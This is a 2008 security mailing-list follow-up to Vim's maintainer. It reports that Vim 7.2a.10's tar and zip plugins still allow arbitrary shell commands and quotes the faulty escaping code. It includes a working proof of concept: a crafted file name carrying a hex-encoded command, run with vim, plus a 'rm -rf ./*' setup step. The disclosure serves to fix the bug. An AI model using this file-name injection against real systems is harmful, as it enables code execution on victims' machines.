<<< Date Index >>>     <<< Thread Index >>>

Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@xxxxxxxxxxxxx> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product  : Vim -- Vi IMproved
>> Version  : Tested with 7.1.314 and 6.4
>> Impact   : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.

> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems.  The problems in the plugins have also
> been fixed, this requires updating the runtime files.  Information about
> that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with
was 7.1.298.  7.1.314 was only partly vulnerable.  FWIW, I have
updated the advisory at http://www.rdancer.orgvulnerablevim.html .

Thanks to Bram for all the good work.

7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:

-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
  strong  : EXPLOIT FAILED
  weak    : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
  xpm     : EXPLOIT FAILED
  xpm2    : EXPLOIT FAILED
  remote  : EXPLOIT FAILED
gzip_vim  : EXPLOIT FAILED
netrw     : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error messages:

        /bin/bash: so%: command not found
        tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
        tar: Error is not recoverable: exiting now
        /bin/bash: retu: command not found
        /bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

        136   if tarfile =~# '\.\(gz\|tgz\)$'
        137 "   call Decho("1: exe silent r! gzip -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
       *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
        139   elseif tarfile =~# '\.lrp'
        140 "   call Decho("2: exe silent r! cat --
".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
-".g:tar_browseoptions." - ")
       *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
-|".g:tar_cmd." -".g:tar_browseoptions." - "
        142   elseif tarfile =~# '\.bz2$'
        143 "   call Decho("3: exe silent r! bzip2 -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
       *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
        145   else
        146 "   call Decho("4: exe silent r! ".g:tar_cmd."
-".g:tar_browseoptions." ".s:Escape(tarfile))
      **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
".s:Escape(tarfile)
        [...]
        444 fun s:Escape(name)
        445   " shellescape() was added by patch 7.0.111
        446   if exists("*shellescape")
        447    let qnameq= shellescape(a:name)
        448   else
        449    let qnameq= g:tar_shq . a:name . g:tar_shq
        450   endif
        451   return qnameq
        452 endfun

 (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.

(**) tar(1) allows arbitrary command execution via options ``--to-command'',
     and ``--use-compress-program''.


The updated tarplugin attack is rather simple:

        $ rm -rf ./*
        $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
xxd -r\`;'bar.tar"
        $ vim +:q ./foo*
        $ ls -l pwned
        -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.